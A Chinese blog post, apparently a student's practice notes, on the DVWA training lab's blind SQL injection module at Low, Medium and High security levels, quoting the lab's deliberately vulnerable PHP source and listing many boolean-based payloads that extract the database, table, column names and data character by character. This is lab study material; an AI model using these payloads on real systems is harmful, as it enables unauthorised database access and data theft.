dvwa靶场第四周练习以及心得(2)

最新推荐文章于 2024-05-10 16:54:35 发布
最新推荐文章于 2024-05-10 16:54:35 发布
阅读量205 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vicissitud/article/details/129049288
版权
文章详细介绍了SQL注入中的盲注类型,包括常规盲注与布尔盲注、时间盲注的区别,通过示例展示了如何通过构造SQL语句来探测数据库信息,如库名、表名和字段值。同时,文章列举了不同安全等级的代码示例,展示了从低级别到高级别防护措施的升级,如使用mysql_real_escape_string函数和LIMIT限制查询。
摘要由CSDN通过智能技术生成

SQL Injection(Blind)(SQL注入之盲注)

SQL Injection(Blind),SQL盲注,相比于常规的SQL注入,他不会将返回具体的数据信息或语法信息,只会将服务器包装后的信息返回到页面中。

常规SQL注入与SQL盲注详细对比

SQL注入1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等。
2.一般在页面上直接就会显示执行sql语句的结果。
SQL盲注

1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注)
2.一般在页面上不会直接显示sql执行的结果
3.有可能出现不确定sql是否执行的情况

 

 

 

布尔盲注与时间盲注对比

布尔盲注

  可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码...),将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果(True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注响应从True<-->False发生变化的转折点。

SQL盲注流程

1.判断是否存在注入,注入的类型

2.猜解当前数据库名称

3.猜解数据库中的表名

4.猜解表中的字段名

5.获取表中的字段值

6.验证字段值的有效性

7.获取数据库的其他信息:版本、用户…

实验环境

Low

源码解析

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
//最后的判断只有两种
num大于0输出User ID exists in the database
num小于等于0 输出User ID is MISSING from the database
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

  对传参没有进行任何检查、过滤,返回参数只有User ID exists in the database.和User ID is MISSING from the database.两种

(1)首先找到注入点,判断注入的类型

1
1 \
1' #  猜闭合方式

 

 (2)查找库名(以数据库名的第一个字母为例)(最终查到的库名:root)

1' and (select ascii(substr(database(),1,1)) > 111) #
1' and (select ascii(substr(database(),1,1)) > 120) #
1' and (select ascii(substr(database(),1,1)) > 115) #
1' and (select ascii(substr(database(),1,1)) > 113) #
1' and (select ascii(substr(database(),1,1)) = 114) #

 (3)查找表名(以数据库的第一个表的第一个字母为例)(最终查到的表名:guestbook)

1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) > 101) #
1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) > 110) #
1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) > 105) #
1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) > 103) #
1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) > 102) #
1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) = 103) #

 

 (4)查找表中的第一个字段名(以数据库中第一个表的第一个字段为例)(最终查到的列名:comment_id)

1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) > 101) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) < 101) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) < 90) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) < 95) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) < 98) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) < 99) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) < 100) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) = 99) #

 (5)查找数据库中第一个表中第一个字段中的第一个数据的第一个字母(最终查到的数据:1)

1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) > 101) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) > 50) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) > 30) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) > 40) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) > 45) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) > 48) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) = 49) #

   剩余的数据就不在一个一个具体的查找了,就按照这种方法,可以一个个的将数据全部查找出来。

Medium

源码解析

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
//对特殊符号
\x00,\n,\r,\,’,”,\x1a进行转义
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

漏洞复现

Medium级别的代码利用mysql_real_escape_string函数对特殊符号  \x00,\n,\r,,’,”,\x1a  进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。

和普通的SQL注入方式差不多,只是需要BP来抓包修改参数值

参考Low级别过程和   https://www.cnblogs.com/chadlas/articles/15724905.html   中的Medium级别过程

1 #
1 and (select ascii(substr(database(),1,1)) = 114) #
1 and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) = 103) #
1 and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) = 99) #
1 and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) = 49) #

High

源码解析

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
//limit限制查询只能为1条
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
//返回MISSING时,会随机执行sleep()函数,做执行,则延迟的时间是随机在2-4s
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

漏洞复现

  对于LIMIT 1的限制输出记录数目,可以利用#注释其限制;服务端可能会随机执行sleep()函数,做执行,则延迟的时间是随机在2-4s,这样会对正常的基于时间延迟的盲注测试造成干扰。因此可以考虑用基于布尔的盲注进行测试。

  可以参考Low级别的代码:

1' #
1' and (select ascii(substr(database(),1,1)) = 114) #
1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='root' limit 0,1),1,1)) = 103) #
1' and (select ascii(substr((select column_name from information_schema.columns where table_schema='root' and table_name='guestbook' limit 0,1),1,1)) = 99) #
1' and (select ascii(substr((select comment_id from guestbook limit 0,1),1,1)) = 49) #

 

 

Vicissitud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA(LOW)学习心得【持续更新】
MZEPSan的博客
12-10 1129
应学长要求,开始学习DVWA的有关知识。虽然临近期末,但是感觉拿来在休闲时间玩玩还是挺好的。如果写得有什么问题,希望各位师傅能予以指正。 第一部分:SQL注入 登上平台之后打开如下页面: 就一个输入框真的看不出什么,看看代码吧… 先贴代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_R...
DVWA总结
m0_46315342的博客
11-30 703
很久没碰这些东西了,加上之前也没整理过,正好趁着这个月整理一下。 bruteforce easy 没有任何的防护, medium 在easy的基础上,加了一个错误后的slepp(2)语句 high 一开始便检查了user_token和session_token, impossible 在high的基础上,加上了PDO扩展,然后设置了失败的次数为3次,如果超过3次,等待15分钟 CSRF(cross site request forgery) easy 没有任何的防护,由于逻辑设计的问题,可以直接更
DVWS靶场总结(详细)--主要用来复习(暂未完善,累了大体框架已成)
最新发布
m0_68976043的博客
05-10 972
看源码可以看到,开发人员将该密码修改操作分成了两步,第一步通过验证码验证是否机器人且验证两次密码输入是否一样,验证通过后,服务器返回表单,第二步,要求用户确认修改密码,客户端提交post请求,服务器完成更改密码的操作。session称为会话信息,位于web服务器上,主要负责访问者与网站之间的交互,当访问浏览器请求http地址时,将传递到web服务器上并与访问信息进行匹配, 当关闭网站时就表示会话已经结束,网站无法访问该信息了,所以它无法保存永久数据,我们无法访问以及禁用网站。
【网络安全学习】渗透测试篇01-DVWA靶场环境搭建教程
JackFCH的博客
10-08 5495
网上不乏有许多类似的教程,但经过笔者检验后发现,多数的文章内容相近且不详细。使笔者在进行环境搭建的过程中着实走了不少弯路。就连DVWA的下载链接也早已不可用,因此为帮助学习者节省时间,笔者重新归纳了整套流程并将其发布于此。一、介绍及注意事项DVWA(Damn Vulnerable Web Application)是一款PHP/MySQL的网络应用程序,其设计目的主要是为了帮助安全专家们在合法的环境下测试他们的技能和工具,或是帮助学生和开发者们更好地理解和学习网络应用程序的安全知识,比如Web渗透。
DVWA漏洞平台靶场练习 总结 wp
Alexhirchi的博客
08-06 2290
文章目录Brute Force(暴力破解)lowmediumhighimpossibleCommand Injection(命令注入)lowmediumhighimpossibleCSRF(跨站请求伪造)lowmediumhighimpossibleFile Inclusion(文件包含) Brute Force(暴力破解) 概述:利用暴力破解(跑字典)去获得登录权限 low 漏洞描述:通过get请求获取usename和passwd,可以使用burp的暴力破解或者使用万能密码 'or '1'='1 medi
dvwa靶场第三周练习以及心得(2)
Vicissitud的博客
02-15 164
dvwa靶场第三周练习以及心得(2)
dvwa靶场,可以用于练习web渗透技术
05-19
dvwa靶场压缩包
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web...在DVWA靶场中,可以模拟真实的漏洞环境,进行练习和提升自己的技能。
DVWA网络安全靶场搭建与练习 附攻略和在线版
01-02
DVWA网络安全靶场搭建与练习 附攻略和在线版》 网络安全靶场是一种模拟真实网络环境,用于安全教育、训练和测试安全技能的平台。DVWA(Damn Vulnerable Web Application)是其中非常受欢迎的一个开源项目,专为...
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA靶场源码分享
12-11
DVWA(Damn Vulnerable Web Application)靶场是一个用于网络安全教育的开源Web应用程序。它由Chris Evans创建,旨在帮助安全专业人员、开发人员和学生通过实践来学习和理解常见Web应用程序安全漏洞。DVWA靶场提供了...
dvwa靶场第五周练习以及心得
Vicissitud的博客
02-15 204
dvwa靶场第五周练习以及心得
2021-02-06
zhaodoudou1221的博客
02-06 416
**DVWA-SQL Injection ** SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入(非盲注)的步骤 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.查数据库 5.查表 6.获取表中的字段名
DVWA 实验报告:7、SQL 注入 SQL Injection
看那白熊
05-17 1302
dvwa SQL注入漏洞复现
dvwa靶场四周练习以及心得(3)
Vicissitud的博客
02-15 120
dvwa靶场四周练习以及心得(3)
dvwa靶场四周练习以及心得(4)
Vicissitud的博客
02-15 153
dvwa靶场四周练习以及心得(4)
DVWA靶场部分关卡总结
m0_65429684的博客
03-28 1960
HTTP 是无状态的协议(对于事务处理没有记忆能力,每次客户端和服务端会话完成时,服务端不会保存任何会话信息):每个请求都是完全独立的,服务端无法确认当前访问者的身份信息,无法分辨上一次的请求发送者和这一次的发送者是不是同一个人。所以服务器与浏览器为了进行会话跟踪(知道是谁在访问我),就必须主动的去维护一个状态,这个状态用于告知服务端前后两个请求是否来自同一浏览器。而这个状态需要通过 cookie 或者 session 去实现。
dvwa靶场第五周练习以及心得(2)
Vicissitud的博客
02-15 181
dvwa靶场第五周练习以及心得(2)
DVWA靶场-常见漏洞原理以及防御
大博的博客
02-17 2774
本文章可做DVWA普及课件所用 暴力破解 low 查看代码可知,代码中并没有任何防护手段,没有防爆破措施,比如验证码或者是错误登录限制措施,仅仅是设置login参数是否存在。 存在暴力破解和SQL注入。 演示自行使用BP以及自带字典。 medium 比较代码看出,username和password参数都是经过一次mysql_real_escape_string函数转换。查阅手册可知 这个只是减...
dvwa靶场练习教程
07-28
DVWA是一款Web渗透靶场,用于提供合法的专业技能和应用测试环境。它提供了四个不同等级的渗透防护,难度逐级增加。常用于练习XSS、CSRF漏洞等。安装和配置DVWA可以使用phpstudy完成。首先,需要下载并解压dvwa的安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值